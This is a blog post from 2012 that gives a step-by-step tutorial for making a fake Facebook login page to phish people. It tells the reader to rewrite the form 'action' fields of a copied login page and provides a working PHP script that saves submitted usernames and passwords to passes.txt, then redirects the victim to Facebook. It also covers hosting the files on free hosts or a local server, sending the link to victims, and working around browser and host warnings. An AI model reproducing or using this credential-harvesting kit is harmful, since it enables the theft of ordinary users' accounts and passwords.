Find us on Google+ Bypass The Security: Phishing

Monday 12 November 2012

Phishing


Phishing




Friends, I know that many of you are curious to know “How to Create Fake Login Page for Phishing???”. So today I’m explaining you that how to create fake login page of any website which is mainly done for phishing attacks. Remember friends creating a fake login page is not an easy job. It requires high skills specially in the field of some web development languages especially html and php. But if you do not have any knowledge of such languages then do not worry. I’m going to tell you the steps and you only have to follow them. I’m keeping the introduction part short. So,
Here are the steps :
  • Open the website’s login page you wish.
  • Right click anywhere on the screen and click on “view page source” (in chrome) or “view source”(in internet explorer). When you click on that a page will open containing some scripts.
  • Copy the source code and paste it in notepad or any other text editors.
  • Find (by pressing ctrl+f) “action”. It looks something like this in facebook:



  • Change the above link highlighted with blue colour to record.php (the php file which will record username and password.
  • Find “action” again if it is present and repeat the above step. Do this until the term “action” ends in the source code.
  • Now when it is done save the file as anyname.htm or anyname.html. In my case it is login.htm. Yes the file must be in html format. The name does not matter.


Another thing you will need is a php script to record username and password and save it to a file. If you know php scripting maybe you can do this with your own but for noobs I’m providing that script below.

<?php
header("Location: http://www.facebook.com/");
      $handle = fopen("passes.txt", "a");
      foreach($_GET as $variable => $value)
      {
      fwrite($handle, $variable);
      fwrite($handle, "=");
      fwrite($handle, $value);
      fwrite($handle, "\r\n");
      }
      fwrite($handle, "\r\n");
      fclose($handle);
      exit;
      ?>

  • Copy and paste the above piece of code in notepad and save it as “record.php”. Not any other name.
  • Create a blank text file named “passes.txt” .

Now you have three files:
I   )  login.htm
Ii  )  record.php
Iii )  passes.txt

  • Make an account on any free hosting site that supports php. Like  000webhost.com, 100mb.com, etc.
  • Upload all the three files in the root directory there using file manager of the hosting site you choose. After uploading all the files there, you will get links to all the three files. You do not need to bother about the links of the php file and the text file.
  • Just copy the link of login.htm (you will get the link of all the files that you have uploaded by your hosting site) file and send it to the victim.

That’s it. If the victim tries to login to his/her account via the fake login page, his/her username and password will automatically be saved in the file “passes.txt” and he/she will be redirected to original facebook login page in my case. If you want to redirect the victim to some other website just change http://www.facebook.com/ in the given php script to whichever website you want.

Performing Phishing attack is not an easy job. The main thing is to trick the victim to login using that fake page which is not easy especially now a days when our browsers are capable of scanning such login pages. Your browser will warn you about phishing attack if you open any fake login page. So whenever the victim tries to open that fake page his/her browser will give a warning. But he/she may proceed.

Using file/web hosting site for such attacks has a demerit ,i.e. whenever you want to send the link of the fake login page you made, through any common social networking sites like facebook, twitter, etc or want to send that link via IM chats like yahoo messenger and all, they will restrict you for doing so because of some security reasons. After all they pay millions to their security experts and programmers.We are nothing in front them.

Another problem with this type of attack is that your web/file hosting site will block your account because they scan our files to prevent such type of attacks.Therefore its better to have your own server. There are some tools like wamp server, xampp..etc..that can turn your own pc into a file/web hosting server.

Yes but phishing works fine and good if you have your own server (like with the help of wamp server). This is a traditional process of hacking which is outdated now.

Hope this helps. Please pass comment friends.

No comments:

Post a Comment